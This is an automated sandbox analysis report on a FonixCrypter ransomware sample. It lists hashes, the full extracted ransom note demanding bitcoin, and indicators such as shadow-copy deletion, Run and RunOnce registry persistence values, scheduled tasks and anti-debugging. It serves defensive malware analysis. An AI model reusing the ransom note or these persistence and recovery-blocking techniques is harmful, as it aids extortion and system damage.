de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e

Resubmissions

24/10/2022, 14:59

221024-sczbashcfl 10

02/06/2020, 00:13

200602-s5zbncbaen 9

Analysis

max time kernel
128s
max time network
190s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24/10/2022, 14:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
Size

6.0MB
MD5

df472f90c33e6c341a74fe1ca29dac70
SHA1

d7512488de06b677751014bdc48302c179542558
SHA256

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e
SHA512

4257e88d9c6f5eec59d1da6749c386b3859be04159ec37aba2adb3704e5f2ce11ef3adfb086b86d1bea03db300e1d82cab08f266cf6fae4d8f929e71918ddcf9
SSDEEP

196608:6lwfwLOxsdCZOGdRc7lg6MzQk67CU94Dy0q7:wnmF8O+9SQVCU9420a

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\# How To Decrypt Files #.hta

Ransom Note

ALL YOUR FILES HAS BEEN ENCRYPTED!!! has been encrypted by FonixCrypter using strong cryptography algorithms Salsa20and RSA 4098 Decryption key is hold in our server !!Recovery tools and other software will not help you !! The only way to receive your key and decrypt your files is the payment with bitcoin You have to 48 hours(2 Day) To contact or paying us After that, you have to Pay Double!! Our Email = [email protected] in case of no answer in 24 hours write us to this Email = [email protected] if you don't know how to buy bitcoin you can use this link https://www.coindesk.com/information/how-can-i-buy-bitcoins the easiest way to buy bitcoin is localBitcoins https://localbitcoins.com/ Note: Before payment, you can contact with us and send 1 free small file (size less 2Mb) as decryption test The test files shouldn't contain valuable data like large SQL or Backup files. ATTENTIONS : - Don't delete any files or rename encrypted files - If you using other applications to decrypt, it may damage your files - Don't find your backups? they have been Successfully encrypted too or securly wiped. Regards-FonixTeam

Emails

[email protected]

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4348	icacls.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\management\jmxremote.password.template	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteMediumTile.scale-125.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-40_altform-unplated.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART9.BDR	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\avatar_round_mask.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Windows Media Player\Skins\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchWide310x150Logo.scale-100_contrast-white.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupSmallTile.scale-400.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ppd.xrm-ms	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_neutral_split.scale-100_8wekyb3d8bbwe\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-20_altform-lightunplated.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial1-pl.xrm-ms	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXC	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteMediumTile.scale-200.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-150.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\ControlStyles.xbf	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-125_8wekyb3d8bbwe	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\onenote_whatsnew.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsl.ttf	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\SplashScreen\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ul-oob.xrm-ms	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-ul-oob.xrm-ms	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\THMBNAIL.PNG	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteWideTile.scale-200.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\MoveToFolderToastQuickAction.scale-80.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\pt-PT\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Moustache.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\hi\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubStoreLogo.scale-125_contrast-white.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Warm.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageStoreLogo.scale-100_contrast-black.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\en-US\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL103.XML	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppxSignature.p7x	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\CHIMES.WAV	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_whats_new_v2.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-black_scale-100.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-60.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-400.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ppd.xrm-ms	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_Grace-ppd.xrm-ms	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-white_scale-125.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_RoomSetupDisambig_RoomScale.jpg	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\20.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\dictation\SpeechOn.wav	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-250.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1372	2724	WerFault.exe	36

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4424	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
4356	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4188	WMIC.exe
Token: SeSecurityPrivilege	4188	WMIC.exe
Token: SeTakeOwnershipPrivilege	4188	WMIC.exe
Token: SeLoadDriverPrivilege	4188	WMIC.exe
Token: SeSystemProfilePrivilege	4188	WMIC.exe
Token: SeSystemtimePrivilege	4188	WMIC.exe
Token: SeProfSingleProcessPrivilege	4188	WMIC.exe
Token: SeIncBasePriorityPrivilege	4188	WMIC.exe
Token: SeCreatePagefilePrivilege	4188	WMIC.exe
Token: SeBackupPrivilege	4188	WMIC.exe
Token: SeRestorePrivilege	4188	WMIC.exe
Token: SeShutdownPrivilege	4188	WMIC.exe
Token: SeDebugPrivilege	4188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4188	WMIC.exe
Token: SeRemoteShutdownPrivilege	4188	WMIC.exe
Token: SeUndockPrivilege	4188	WMIC.exe
Token: SeManageVolumePrivilege	4188	WMIC.exe
Token: 33	4188	WMIC.exe
Token: 34	4188	WMIC.exe
Token: 35	4188	WMIC.exe
Token: 36	4188	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4188	WMIC.exe
Token: SeSecurityPrivilege	4188	WMIC.exe
Token: SeTakeOwnershipPrivilege	4188	WMIC.exe
Token: SeLoadDriverPrivilege	4188	WMIC.exe
Token: SeSystemProfilePrivilege	4188	WMIC.exe
Token: SeSystemtimePrivilege	4188	WMIC.exe
Token: SeProfSingleProcessPrivilege	4188	WMIC.exe
Token: SeIncBasePriorityPrivilege	4188	WMIC.exe
Token: SeCreatePagefilePrivilege	4188	WMIC.exe
Token: SeBackupPrivilege	4188	WMIC.exe
Token: SeRestorePrivilege	4188	WMIC.exe
Token: SeShutdownPrivilege	4188	WMIC.exe
Token: SeDebugPrivilege	4188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4188	WMIC.exe
Token: SeRemoteShutdownPrivilege	4188	WMIC.exe
Token: SeUndockPrivilege	4188	WMIC.exe
Token: SeManageVolumePrivilege	4188	WMIC.exe
Token: 33	4188	WMIC.exe
Token: 34	4188	WMIC.exe
Token: 35	4188	WMIC.exe
Token: 36	4188	WMIC.exe
Token: SeBackupPrivilege	2180	vssvc.exe
Token: SeRestorePrivilege	2180	vssvc.exe
Token: SeAuditPrivilege	2180	vssvc.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe
3164	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4788	mshta.exe

